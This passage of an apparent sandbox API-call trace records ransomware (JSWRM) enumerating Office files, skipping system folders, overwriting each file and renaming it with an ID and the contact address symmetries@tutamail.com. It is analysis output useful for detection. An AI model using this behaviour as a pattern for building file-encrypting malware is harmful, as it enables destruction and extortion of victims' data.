office\\root\\office16\\forms\\1033\\recl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.054] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.054] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.054] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.056] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.056] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.056] CloseHandle (hObject=0x314) returned 1 [0130.056] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RECL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\recl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RECL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\recl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.057] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="RECS.ICO", cAlternateFileName="")) returned 1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2=".") returned 1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2="..") returned 1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2="...") returned 1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2="windows") returned -1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2="recovery") returned 1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2="perflogs") returned 1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2="documents and settings") returned 1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2="system volume information") returned -1 [0130.057] lstrcmpiW (lpString1="RECS.ICO", lpString2="msocache") returned 1 [0130.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECS.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RECS.ICO", lpUsedDefaultChar=0x0) returned 8 [0130.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECS.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RECS.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RECS.ICO", lpUsedDefaultChar=0x0) returned 8 [0130.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RECS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\recs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.059] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.059] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.059] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.060] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.061] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.061] CloseHandle (hObject=0x314) returned 1 [0130.061] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RECS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\recs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\RECS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\recs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.062] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30b, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="REMOTE.CFG", cAlternateFileName="")) returned 1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2=".") returned 1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2="..") returned 1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2="...") returned 1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2="windows") returned -1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2="recovery") returned 1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2="perflogs") returned 1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2="documents and settings") returned 1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2="system volume information") returned -1 [0130.062] lstrcmpiW (lpString1="REMOTE.CFG", lpString2="msocache") returned 1 [0130.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTE.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTE.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REMOTE.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTE.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTE.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REMOTE.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REMOTE.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\remote.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.063] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=779) returned 1 [0130.063] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.063] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0130.064] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.064] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0130.065] CloseHandle (hObject=0x314) returned 1 [0130.065] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REMOTE.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\remote.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REMOTE.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\remote.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.066] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="REMOTEL.ICO", cAlternateFileName="")) returned 1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2=".") returned 1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2="..") returned 1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2="...") returned 1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2="windows") returned -1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2="recovery") returned 1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2="perflogs") returned 1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2="documents and settings") returned 1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2="system volume information") returned -1 [0130.066] lstrcmpiW (lpString1="REMOTEL.ICO", lpString2="msocache") returned 1 [0130.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTEL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTEL.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REMOTEL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTEL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTEL.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REMOTEL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REMOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\remotel.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.067] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.067] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.067] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.069] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.069] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.069] CloseHandle (hObject=0x314) returned 1 [0130.069] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REMOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\remotel.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REMOTEL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\remotel.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.070] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="REMOTES.ICO", cAlternateFileName="")) returned 1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2=".") returned 1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2="..") returned 1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2="...") returned 1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2="windows") returned -1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2="recovery") returned 1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2="perflogs") returned 1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2="documents and settings") returned 1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2="system volume information") returned -1 [0130.070] lstrcmpiW (lpString1="REMOTES.ICO", lpString2="msocache") returned 1 [0130.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTES.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTES.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REMOTES.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTES.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REMOTES.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REMOTES.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REMOTES.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\remotes.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.071] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.071] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.071] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.073] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.073] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.073] CloseHandle (hObject=0x314) returned 1 [0130.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REMOTES.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\remotes.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REMOTES.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\remotes.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.074] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="REPLTMPL.CFG", cAlternateFileName="")) returned 1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2=".") returned 1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2="..") returned 1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2="...") returned 1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2="windows") returned -1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2="recovery") returned 1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2="perflogs") returned 1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2="documents and settings") returned 1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2="system volume information") returned -1 [0130.074] lstrcmpiW (lpString1="REPLTMPL.CFG", lpString2="msocache") returned 1 [0130.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPLTMPL.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPLTMPL.CFG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPLTMPL.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPLTMPL.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="REPLTMPL.CFG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REPLTMPL.CFG", lpUsedDefaultChar=0x0) returned 12 [0130.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPLTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\repltmpl.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.075] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=826) returned 1 [0130.075] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.075] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x330, lpOverlapped=0x0) returned 1 [0130.077] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.077] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x330, lpOverlapped=0x0) returned 1 [0130.077] CloseHandle (hObject=0x314) returned 1 [0130.077] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPLTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\repltmpl.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\REPLTMPL.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\repltmpl.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.078] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, 